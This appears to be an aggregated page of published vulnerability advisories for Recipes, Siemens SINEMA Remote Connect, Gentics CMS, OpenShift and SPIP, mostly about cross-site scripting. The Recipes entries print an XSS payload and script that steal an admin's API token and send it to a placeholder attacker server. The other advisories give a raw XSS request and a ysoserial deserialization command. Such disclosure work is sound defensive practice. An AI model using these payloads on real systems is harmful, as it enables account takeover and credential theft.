In Recipes, versions 1.0.5 through 1.2.5 are vulnerable to Stored Cross-Site Scripting (XSS), in copy to clipboard functionality. When a victim accesses the food list page, then adds a new Food with a malicious javascript payload in the ‘Name’ parameter and clicks on the clipboard icon, an XSS payload will trigger. A low privileged attacker will have the victim's API key and can lead to admin's account takeover.

**CVE-2022-23073**

**Date: January 11, 2022**

**Overview**

In Recipes, versions 1.0.5 through 1.2.5 are vulnerable to Stored Cross-Site Scripting (XSS), in copy to clipboard functionality. When a victim accesses the food list page, then adds a new Food with a malicious javascript payload in the ‘Name’ parameter and clicks on the clipboard icon, an XSS payload will trigger. A low privileged attacker will have the victim's API key and can lead to admin's account takeover.

**Details**

In Recipes, versions 1.0.5 through 1.2.5 are vulnerable to Stored Cross-Site Scripting (XSS), in copy to clipboard functionality. When a victim accesses the food list page, then adds a new Food with a malicious javascript payload in the ‘Name’ parameter and clicks on the clipboard icon, an XSS payload will trigger. A low privileged attacker will have the victim's API key and can lead to admin's account takeover.

**PoC Details**

Access the application through a web browser and login as a user. Now navigate to the food list from the navigation bar. On the food list page, click on the plus '+' icon. Under the name input field, enter the XSS payload given in the "POC Code" section below and save it. Then host the JavaScript file for fetching the victim's API (the code for the JavaScript file can be found in the "POC Code" section below). In a new browser window, login as administrator and access the food list page. Then, click on the clipboard icon, this will trigger the XSS payload and the attacker will receive the admin's API key in the listener.

**PoC Code**

    XSS payload: 
    <img src=a onerror="var x=document.createElement('script');x.src='<attacker_server>/api.js';document.body.appendChild(x);">
    
    JavaScript file (api.js):
    var req = new XMLHttpRequest();
    req.onload = handleResponse;
    req.open('get','/settings/',true);
    req.send();
    function handleResponse() {
    t var a=this.responseText.match(/Authorization: Token.{1,}/)[0];
    t a=a.split("Token ")[1];
    t a=a.split("<")[0];
    t console.log(a);
    t var changeReq = new XMLHttpRequest();
         changeReq.open('get', '<attacker_server>:<attacker_port>/api='+a, false);
         changeReq.send()

**Affected Environments**

1.0.5 through 1.2.5

**Prevention**

Update version to 1.2.6 or higher

**Language: Python**

**Good to know:**

*   Severity Score
*   Weakness Type (CWE)
*   Top Fix

Cross-Site Scripting (XSS)

CWE-79

****Upgrade Version****

Upgrade to version 1.2.6

Learn More

*   CVSS v3.1

Base Score:

5.4

Attack Vector (AV):

Network

Attack Complexity (AC):

Low

Privileges Required (PR):

Low

User Interaction (UI):

Required

Scope (S):

Changed

Confidentiality (C):

Low

Integrity (I):

Low

Availability (A):

None

**Related Resources (3)**

CVE-2022-23073: Mend Vulnerability Database

In Recipes, versions 1.0.5 through 1.2.5 are vulnerable to Stored Cross-Site Scripting (XSS), in â€œAdd to Cartâ€? functionality. When a victim accesses the food list page, then adds a new Food with a malicious javascript payload in the â€˜Nameâ€™ parameter and clicks on the Add to Shopping Cart icon, an XSS payload will trigger. A low privileged attacker will have the victim's API key and can lead to admin's account takeover.

**CVE-2022-23072**

**Date: January 11, 2022**

**Overview**

In Recipes, versions 1.0.5 through 1.2.5 are vulnerable to Stored Cross-Site Scripting (XSS), in “Add to Cart” functionality. When a victim accesses the food list page, then adds a new Food with a malicious javascript payload in the ‘Name’ parameter and clicks on the Add to Shopping Cart icon, an XSS payload will trigger. A low privileged attacker will have the victim's API key and can lead to admin's account takeover.

**Details**

In Recipes, versions 1.0.5 through 1.2.5 are vulnerable to Stored Cross-Site Scripting (XSS), in “Add to Cart” functionality. When a victim accesses the food list page, then adds a new Food with a malicious javascript payload in the ‘Name’ parameter and clicks on the Add to Shopping Cart icon, an XSS payload will trigger. A low privileged attacker will have the victim's API key and can lead to admin's account takeover.

**PoC Details**

Access the application through a web browser and login as a user. Now navigate to the food list from the navigation bar. On the food list page, click on the plus '+' icon. Under the name input field, enter the XSS payload given in the "POC Code" section below and save it. Then host the JavaScript file for fetching the victim's API (the code for the JavaScript file can be found in the "POC Code" section below). In a new browser window, login as administrator and access the food list page. Now, click on the add to shopping cart icon, this will trigger the XSS payload and the attacker will receive the admin's API key in the listener on the attacker hosting port.

**PoC Code**

    XSS payload: 
    <img src=a onerror="var x=document.createElement('script');x.src='<attacker_server>/api.js';document.body.appendChild(x);">
    
    JavaScript file (api.js):
    var req = new XMLHttpRequest();
    req.onload = handleResponse;
    req.open('get','/settings/',true);
    req.send();
    function handleResponse() {
    t var a=this.responseText.match(/Authorization: Token.{1,}/)[0];
    t a=a.split("Token ")[1];
    t a=a.split("<")[0];
    t console.log(a);
    t var changeReq = new XMLHttpRequest();
         changeReq.open('get', '<attacker_server>:<attacker_port>/api='+a, false);
         changeReq.send()

**Affected Environments**

1.0.5 through 1.2.5

**Prevention**

Update version to 1.2.6 or higher

**Language: Python**

**Good to know:**

*   Severity Score
*   Weakness Type (CWE)
*   Top Fix

Cross-Site Scripting (XSS)

CWE-79

****Upgrade Version****

Upgrade to version 1.2.6

Learn More

*   CVSS v3.1

Base Score:

5.4

Attack Vector (AV):

Network

Attack Complexity (AC):

Low

Privileges Required (PR):

Low

User Interaction (UI):

Required

Scope (S):

Changed

Confidentiality (C):

Low

Integrity (I):

Low

Availability (A):

None

**Related Resources (3)**

CVE-2022-23072: Mend Vulnerability Database

Microweber versions 1.2.17 and prior are vulnerable to cross-site scripting. A patch is available on the `dev laravel9-php8` branch of the repository.

**Cross-site Scripting in Microweber**

Moderate severity GitHub Reviewed Published Jun 21, 2022 • Updated Jun 21, 2022

GHSA-27g3-58v4-fg9w: Cross-site Scripting in Microweber

SIEMENS-SINEMA Remote Connect versions 3.0.1.0-01.01.00.02 and below suffer from a cross site scripting vulnerability.

SEC Consult Vulnerability Lab Security Advisory < 20220614-0 >  
=======================================================================  
               title: Reflected Cross Site Scripting  
             product: SIEMENS-SINEMA Remote Connect  
  vulnerable version: <=V3.0.1.0-01.01.00.02  
       fixed version: V3.1.0  
          CVE number: CVE-2022-29034  
              impact: medium  
            homepage: https://siemens.com  
               found: 2022-03-01  
                  by: S. Robertz (Office Vienna)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Siemens is a technology company focused on industry, infrastructure,  
transport, and healthcare.  
 From more resource-efficient factories, resilient supply chains, and smarter  
buildings and grids, to cleaner and more comfortable transportation as well as  
advanced healthcare, we create technology with purpose adding real value for  
customers. By combining the real and the digital worlds, we empower our  
customers to transform their industries and markets, helping them to transform  
the everyday for billions of people."

"SINEMA Remote Connect is the management platform for remote networks. It is a  
server application that enables the simple management of tunnel connections  
(VPN) between headquarters, service technicians, and installed machines or  
plants."

Source: https://www.siemens.com  
Source:   
https://new.siemens.com/global/en/products/automation/industrial-communication/industrial-remote-communication/remote-networks/sinema-remote-connect-access-service.html

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

Vulnerability overview/description:  
-----------------------------------  
1) Reflected Cross Site Scripting (CVE-2022-29034)  
The application contains a reflected cross-site-scripting vulnerability that  
can be used to execute JavaScript code in the victim's browser.

Proof of concept:  
-----------------  
1) Reflected Cross Site Scripting (CVE-2022-29034)  
The error occurs when setting the syslog server to an illegal IP address. An  
error message will pop up and will reflect the supplied IP address. However,  
the popup message does not use the proper JQuery method, and thus allows to  
inject JavaScript code. Note that dots can not be used in the JavaScript  
payload, as they will get filtered by the IP parser that runs beforehand.  
This was circumvented by supplying the JavaScript code in base64.

Following request can be used to trigger the XSS:

POST /services/syslog_client_settings HTTP/1.1  
Host: $host  
Cookie: sessionid=708xmctjzk39og596jp4q4r1udfom4l5;  
csrftoken=sP8NzwJozla1k18xrRzsXiY0zq16IyBddtlDA1C5BC1Orf0oGcqUPr2bpUv1VGLu  
Content-Length: 153  
X-Requested-With: XMLHttpRequest  
X-Csrftoken: U5AQMbPh3JTcdfdBkgIvaLtoitpS7jUVFJNGNGIY50KZkt5szBzX2Uxz8XTNkr4c  
Referer: https://$host/services/syslog_client_settings  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close

address=127.0.0.1.<script>eval(atob("YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="))</script>&port=1234&pr  
otocol=tcp&client_authentication=false&certificate=62&mode=

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested and found to be vulnerable:  
* V3.0.1.0-01.01.00.02

Vendor contact timeline:  
------------------------  
2022-04-01: Sending advisory via productcert@siemens.com  
2022-04-01: Issue tracked by Siemens under case #29947  
2022-04-19: Siemens confirms vulnerability. Patch available mid May.  
             Coordinated advisory release date for 2022-06-14.  
2022-06-07: Asking for fixed versions & CVE numbers.  
2022-06-14: Coordinated advisory release.

Solution:  
---------  
Version V3.1.0 fixes our identified issues as well as other security  
vulnerabilities according to the vendor. The firmware can be downloaded here:  
https://support.industry.siemens.com/cs/ww/en/view/109811169/

The vendor published a security advisory as well:  
https://cert-portal.siemens.com/productcert/html/ssa-484086.html

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF S. Robertz / @2022

SIEMENS-SINEMA Remote Connect 3.0.1.0-01.01.00.02 Cross Site Scripting

Red Hat Security Advisory 2022-4947-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.6.59. Issues addressed include cross site scripting and memory exhaustion vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: OpenShift Container Platform 4.6.59 security update  
Advisory ID:       RHSA-2022:4947-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:4947  
Issue date:        2022-06-17  
CVE Names:         CVE-2022-1708 CVE-2022-29036 CVE-2022-29046   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.6.59 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.6.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenShift Container Platform 4.6 - noarch, ppc64le, s390x, x86_64

3. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container  
Platform 4.6.59. See the following advisory for the container images for  
this release:

https://access.redhat.com/errata/RHBA-2022:4948

Security Fix(es):

* credentials: Stored XSS vulnerabilities in jenkins plugin  
(CVE-2022-29036)  
* subversion: Stored XSS vulnerabilities in Jenkins subversion plugin  
(CVE-2022-29046)  
* cri-o: memory exhaustion on the node when access to the kube api  
(CVE-2022-1708)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.6 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift Console  
or the CLI oc command. Instructions for upgrading a cluster are available  
at  
https://docs.openshift.com/container-platform/4.6/updating/updating-cluster-cli.html

4. Solution:

For OpenShift Container Platform 4.6 see the following documentation, which  
will be updated shortly for this release, for important instructions on how  
to upgrade your cluster and fully apply this asynchronous errata update:

https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html

Details on how to access this content are available at  
https://docs.openshift.com/container-platform/4.6/updating/updating-cluster-cli.html

5. Bugs fixed (https://bugzilla.redhat.com/):

2074847 - CVE-2022-29036 credentials: Stored XSS vulnerabilities in jenkins plugin  
2074851 - CVE-2022-29046 subversion: Stored XSS vulnerabilities in Jenkins subversion plugin  
2085361 - CVE-2022-1708 cri-o: memory exhaustion on the node when access to the kube api

6. Package List:

Red Hat OpenShift Container Platform 4.6:

Source:  
conmon-2.0.21-3.rhaos4.6.el7.src.rpm  
cri-o-1.19.7-2.rhaos4.6.git3c20b65.el7.src.rpm  
openshift-4.6.0-202205181042.p0.g8203b20.assembly.stream.el7.src.rpm

x86_64:  
conmon-2.0.21-3.rhaos4.6.el7.x86_64.rpm  
cri-o-1.19.7-2.rhaos4.6.git3c20b65.el7.x86_64.rpm  
cri-o-debuginfo-1.19.7-2.rhaos4.6.git3c20b65.el7.x86_64.rpm  
openshift-hyperkube-4.6.0-202205181042.p0.g8203b20.assembly.stream.el7.x86_64.rpm

Red Hat OpenShift Container Platform 4.6:

Source:  
conmon-2.0.21-3.rhaos4.6.el8.src.rpm  
cri-o-1.19.7-2.rhaos4.6.git3c20b65.el8.src.rpm  
cri-tools-1.19.0-7.el8.src.rpm  
ignition-2.6.0-9.rhaos4.6.git947598e.el8.src.rpm  
jenkins-2-plugins-4.6.1653312933-1.el8.src.rpm  
openshift-4.6.0-202205181042.p0.g8203b20.assembly.stream.el8.src.rpm

noarch:  
jenkins-2-plugins-4.6.1653312933-1.el8.noarch.rpm

ppc64le:  
conmon-2.0.21-3.rhaos4.6.el8.ppc64le.rpm  
cri-o-1.19.7-2.rhaos4.6.git3c20b65.el8.ppc64le.rpm  
cri-o-debuginfo-1.19.7-2.rhaos4.6.git3c20b65.el8.ppc64le.rpm  
cri-o-debugsource-1.19.7-2.rhaos4.6.git3c20b65.el8.ppc64le.rpm  
cri-tools-1.19.0-7.el8.ppc64le.rpm  
cri-tools-debuginfo-1.19.0-7.el8.ppc64le.rpm  
cri-tools-debugsource-1.19.0-7.el8.ppc64le.rpm  
ignition-2.6.0-9.rhaos4.6.git947598e.el8.ppc64le.rpm  
ignition-debuginfo-2.6.0-9.rhaos4.6.git947598e.el8.ppc64le.rpm  
ignition-debugsource-2.6.0-9.rhaos4.6.git947598e.el8.ppc64le.rpm  
ignition-validate-2.6.0-9.rhaos4.6.git947598e.el8.ppc64le.rpm  
ignition-validate-debuginfo-2.6.0-9.rhaos4.6.git947598e.el8.ppc64le.rpm  
openshift-hyperkube-4.6.0-202205181042.p0.g8203b20.assembly.stream.el8.ppc64le.rpm

s390x:  
conmon-2.0.21-3.rhaos4.6.el8.s390x.rpm  
cri-o-1.19.7-2.rhaos4.6.git3c20b65.el8.s390x.rpm  
cri-o-debuginfo-1.19.7-2.rhaos4.6.git3c20b65.el8.s390x.rpm  
cri-o-debugsource-1.19.7-2.rhaos4.6.git3c20b65.el8.s390x.rpm  
cri-tools-1.19.0-7.el8.s390x.rpm  
cri-tools-debuginfo-1.19.0-7.el8.s390x.rpm  
cri-tools-debugsource-1.19.0-7.el8.s390x.rpm  
ignition-2.6.0-9.rhaos4.6.git947598e.el8.s390x.rpm  
ignition-debuginfo-2.6.0-9.rhaos4.6.git947598e.el8.s390x.rpm  
ignition-debugsource-2.6.0-9.rhaos4.6.git947598e.el8.s390x.rpm  
ignition-validate-2.6.0-9.rhaos4.6.git947598e.el8.s390x.rpm  
ignition-validate-debuginfo-2.6.0-9.rhaos4.6.git947598e.el8.s390x.rpm  
openshift-hyperkube-4.6.0-202205181042.p0.g8203b20.assembly.stream.el8.s390x.rpm

x86_64:  
conmon-2.0.21-3.rhaos4.6.el8.x86_64.rpm  
cri-o-1.19.7-2.rhaos4.6.git3c20b65.el8.x86_64.rpm  
cri-o-debuginfo-1.19.7-2.rhaos4.6.git3c20b65.el8.x86_64.rpm  
cri-o-debugsource-1.19.7-2.rhaos4.6.git3c20b65.el8.x86_64.rpm  
cri-tools-1.19.0-7.el8.x86_64.rpm  
cri-tools-debuginfo-1.19.0-7.el8.x86_64.rpm  
cri-tools-debugsource-1.19.0-7.el8.x86_64.rpm  
ignition-2.6.0-9.rhaos4.6.git947598e.el8.x86_64.rpm  
ignition-debuginfo-2.6.0-9.rhaos4.6.git947598e.el8.x86_64.rpm  
ignition-debugsource-2.6.0-9.rhaos4.6.git947598e.el8.x86_64.rpm  
ignition-validate-2.6.0-9.rhaos4.6.git947598e.el8.x86_64.rpm  
ignition-validate-debuginfo-2.6.0-9.rhaos4.6.git947598e.el8.x86_64.rpm  
openshift-hyperkube-4.6.0-202205181042.p0.g8203b20.assembly.stream.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1708  
https://access.redhat.com/security/cve/CVE-2022-29036  
https://access.redhat.com/security/cve/CVE-2022-29046  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYqxsgNzjgjWX9erEAQhqvQ//QMWTnZDBjLaqkTnBWy7pg/F5vmI4/NTq  
CBtfwzKOxXaU8F5bfNe8Fn/Bi5x9QMvPhQagfi9Ta1N2sVcjbn1yrPoTqGI8PXvt  
5+xSHpQ++AExE/apQJULv4AJ5X7T9plEuUFSzxjZOc1fY08bY9IjwuFImeKJzNeU  
28Q0+X4U9xpFJErAqHCoZq7AENOcmDPASgQSCD0H1n/6MiAuyJUve3N8zp2Q6Rw2  
5zibNSqY/+KRDyqMY4vhffE5E7umOoZD6pN2R5xqujt9G79Ng9/q56g/P9Vo8H5H  
cIqVfS3fs1CtkScKtoOdyGqDxUVNat+er08WeGgIR/Lf9QLp5aK7sVEQ6DJr+pmO  
Vj4DkVoItjGci5fCa6SFrJXh3nXWzTXRGZ+cJnBWy58/WSEeR+6QvrJA0aXkd2QF  
NY0kG/0IZtuNDxH51i/3aiDWyRI3qyVk8wEUp49UZIyrm2YRzUsLMnK3+SjkvyAD  
HOTn0myuMrghjwPhTJlEMxAIg9WcWPjNlHDYaCkryvg1djRE7jFwSxfPvxtMihSm  
5QhwyeAUkML9M18qgA1FzzIpzUs1yschmHXv/z8cQD2df2xx+M6L2YDG2oM0wY+J  
/BsG29O3slFW26UxzoXnMMduTvkCsL/4FPTP5FuMTdq3ND2kJWn2yyrPguzfCQ4J  
YUNj8/D1SM8=  
=LEX6  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-4947-01

Ubuntu Security Notice 5482-1 - It was discovered that SPIP incorrectly validated inputs. An authenticated attacker could possibly use this issue to execute arbitrary code. Charles Fol and Theo Gordyjan discovered that SPIP is vulnerable to cross site scripting. If a user were tricked into browsing a malicious SVG file, an attacker could possibly exploit this issue to execute arbitrary code. This issue was only fixed in Ubuntu 21.10.

    ==========================================================================Ubuntu Security Notice USN-5482-1June 16, 2022spip vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 21.10- Ubuntu 18.04 LTSSummary:Several security issues were fixed in SPIP.Software Description:- spip: website engine for publishingDetails:It was discovered that SPIP incorrectly validated inputs. An authenticatedattacker could possibly use this issue to execute arbitrary code.(CVE-2020-28984)Charles Fol and Théo Gordyjan discovered that SPIP is vulnerable to CrossSite Scripting (XSS). If a user were tricked into browsing a malicious SVGfile, an attacker could possibly exploit this issue to execute arbitrarycode. This issue was only fixed in Ubuntu 21.10. (CVE-2021-44118,CVE-2021-44120, CVE-2021-44122, CVE-2021-44123)It was discovered that SPIP incorrectly handled certain forms. A remoteauthenticated editor could possibly use this issue to execute arbitrary code,and a remote unauthenticated attacker could possibly use this issue to obtainsensitive information. (CVE-2022-26846, CVE-2022-26847)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 21.10:  spip                            3.2.11-3+deb11u3build0.21.10.1Ubuntu 18.04 LTS:  spip                            3.1.4-4~deb9u5build0.18.04.1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5482-1  CVE-2020-28984, CVE-2021-44118, CVE-2021-44120, CVE-2021-44122,  CVE-2021-44123, CVE-2022-26846, CVE-2022-26847Package Information:  https://launchpad.net/ubuntu/+source/spip/3.2.11-3+deb11u3build0.21.10.1  https://launchpad.net/ubuntu/+source/spip/3.1.4-4~deb9u5build0.18.04.1

Ubuntu Security Notice USN-5482-1

Gentics CMS version 5.36.29 suffers from persistent cross site scripting and unsafe java deserialization vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20220608-0 >  
=======================================================================  
               title: Stored Cross-Site Scripting & Unsafe Java Deserializiation  
             product: Gentics CMS  
  vulnerable version: 5.36.29, see section below  
       fixed version: 5.40.27, 5.41.15, 5.42.7, 5.43.1 or higher  
          CVE number: CVE-2022-30981, CVE-2022-30982  
              impact: high  
            homepage: https://www.gentics.com/  
               found: 2021-04-02  
                  by: Gerhard Hechenberger (Office Vienna)  
                      Steffen Robertz (Office Vienna)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"APA-IT Informations Technologie GmbH offers offers support with a focus on  
media solutions and IT-outsourcing. As a subsidiary of APA – Austria Press  
Agency, we are responsible for the IT of the Austrian news agency as well  
as numerous other media enterprises.  
This expertise and insight into the industry make APA-IT an expert for IT  
solutions for publishers and media-related companies. Existing systems and  
tools are constantly developed and tailored to individual customer needs.  
As such, APA-IT is always available – from conception to operation."

Source: https://www.gentics.com/genticscms/company_gentics.en.html

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

SEC Consult recommends to perform a thorough security review of these products  
conducted by security professionals to identify and resolve all security  
issues.

Vulnerability overview/description:  
-----------------------------------  
1) Multiple Stored Cross-Site Scripting Vulnerabilities (CVE-2022-30982)  
Multiple cross-site scripting vulnerabilities are present in the application.  
An attacker can store malicious JavaScript code in the username and profile  
description. The code will execute once an admin user hovers over the  
attacker's username. Thus, the attacker can execute code in the context of an  
admin.

2) Unsafe Java Deserialization (CVE-2022-30981)  
The Gentics CMS has an import option which will accept ZIP files. The archive  
includes a Java serialized object that gets deserialized on import. This can  
lead to code execution on the server.  
A low privileged user might be able to exploit this vulnerability by chaining  
it together with vulnerability 1).

Proof of concept:  
-----------------  
1) Multiple Stored Cross-Site Scripting Vulnerabilities (CVE-2022-30982)  
To trigger the first XSS, an attacker has to change the profile description to  
include a payload, e.g. "<script>alert(document.domain)</script)". The payload  
will execute once a user with access to the userlist hovers his mouse over the  
profile name. The event "onmouseover" will trigger following code:

JSI3_comp_list_401__ass( this, 'Properties', '<b>Malicious User Name</b><br>  
<script>alert(document.domain)</script><br><br>created:<br> 09/20/2002  
( Gentics Support)<br>last edited:<br>15:56 (Malicious Username)', '' );

The execution of the code leads to following function:

function JSI3_comp_list_401__ass( obj, title, text, assTitle )  
{  
  JSI3_comp_list_401__assReset();  
  clearTimeout( JSI3_comp_list_401___ass_timeout );  
  JSI3_comp_list_401__ass_show_row( obj, title, text, assTitle );  
}

The malicious code, which is contained in the "text" parameter, gets passed  
through to the next function. There it is added to an HTML element and thus  
executed in the browser.

function JSI3_comp_list_401__ass_show_row( obj, title, text, assTitle ) {  
  if (!JSI3_comp_list_401__ass_show_row_tipsy[obj.id]) {  
    JSI3_comp_list_401__ass_show_row_tipsy[obj.id] = true;  
    $(obj).attr('title', '<h6>'+title+'</h6>'+text+((assTitle)?'<br>'+assTitle:''));  
    $(obj).tipsy({  
      trigger: 'manual',  
      html: true,  
      offset: 3,  
      delayIn: 900,  
      delayOut: 0,  
      opacity: 0.85,  
      gravity: 'nww'  
    });  
  }  
  $(obj).tipsy("show");  
  gcn_active_tipsy = obj;  
}

Another XSS vector can be found in the parameters "First Name" and "Last Name".  
By e.g. changing the last name to 'Node" onload="alert(document.domain)',  
JavaScript code is added to the profile picture that is loaded in the upper  
right corner on every page. The following snippet shows the vulnerable line of  
code:

<div id="profil">  
<div><img src="?do=11&module=system&img=profile_man.png" title="Admin Node" onload="alert(document.domain)" class="profile_avatar"></div>

The third XSS is caused by changing the first and last name into JavaScript  
code without prior encoding. Changing the last name to  
"Last Name'+eval(alert(document.domain))+'" will cause the following code to be  
included in the server's response:

<script language="JavaScript" type="text/javascript">  
  var menus = new Array();  
  var imgs = new Array();  
  menus['Admin Last Name'+eval(alert(document.domain))+''] = new Array();  
  menus['Admin Last Name'+eval(alert(document.domain))+'']['layer_pos'] = 1;  
  menus['Admin Last Name'+eval(alert(document.domain))+'']['align'] = 'r';

2) Unsafe Java Deserialization (CVE-2022-30981)  
First, a malicious ZIP archive needs to be created. The following files will need to  
be included within this archive:

bundlebuild.xml:

<?xml version="1.0" encoding="UTF-8"?>  
<bundlebuild>  
  <bundleinfo>  
    <name><![CDATA[test4]]></name>  
    <sourcehost><![CDATA[b1d80757b76c]]></sourcehost>  
    <description><![CDATA[]]></description>  
    <globalid>9d6243ab-a281-11eb-9ae3-0242ac130004</globalid>  
    <globalprefix>D77D</globalprefix>  
  </bundleinfo>  
  <builds>  
    <build>  
      <builddate>1618996405</builddate>  
      <changelog><![CDATA[test4]]></changelog>  
      <count>0</count>  
    </build>  
  </builds>  
  <tables>  
  </tables>  
</bundlebuild>

containedobjects.xml:

<?xml version="1.0" encoding="UTF-8"?>  
<objects>  
</objects>

The third file has to be named "serializedjava.bin" and contains the actual  
payload. A demo payload can be generated with following command:  
$ ysoserial FileUpload1 'write;/tmp;SECTEST' > serializedjava.bin

Those three files have to be zipped together into an archive, which can be  
uploaded.

The import feature is available under Enterprise CMS -> Administration ->  
Import and Export. Now select New->Import and upload the malicious ZIP archive.  
Wait until the import completed. Now click on "Test succeeded" in the file  
list. On the new screen select "Start import in background". The payload should  
create a file called "upload_<random_uuid>.tmp" in the folder /tmp. It will  
contain the string "SECTEST".  
Better deserialization chains could be built to reach more interesting targets.  
It is very likely, that RCE could be obtained by writing an own deserialization  
chain.

Vulnerable / tested versions:  
-----------------------------  
The following product version has been tested and found to be vulnerable. Other versions  
are vulnerable as well, please see the vendor's changelog in the solution section.

* Gentics CMS 5.36.29

Vendor contact timeline:  
------------------------  
2022-04-04: Contacting vendor through support@gentics.com  
2022-04-04: Ticket SUP-13323 created.  
2022-04-05: Sent advisory via unencrypted email to provided vendor email address.  
2022-05-04: Updates for Gentics CMS were released on 14th April.  
2022-05-05: Gentics provides us with the fixed version numbers.  
2022-06-08: Release of security advisory.

Solution:  
---------  
Update to versions greater or equal to:  
* 5.40.27 (see https://gentics.com/Content.Node/changelog/5.40.0/5.40.27.html)  
* 5.41.15 (see https://gentics.com/Content.Node/changelog/5.41.0/5.41.15.html)  
* 5.42.7 (see https://gentics.com/Content.Node/changelog/5.42.0/5.42.7.html)  
* 5.43.1 (see https://gentics.com/Content.Node/changelog/5.43.0/5.43.1.html)

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Gerhard Hechenberger, Steffen Robertz / @2022

Gentics CMS 5.36.29 Cross Site Scripting / Deserialization

SolarView Compact version 6.00 suffers from multiple cross site scripting vulnerabilities.

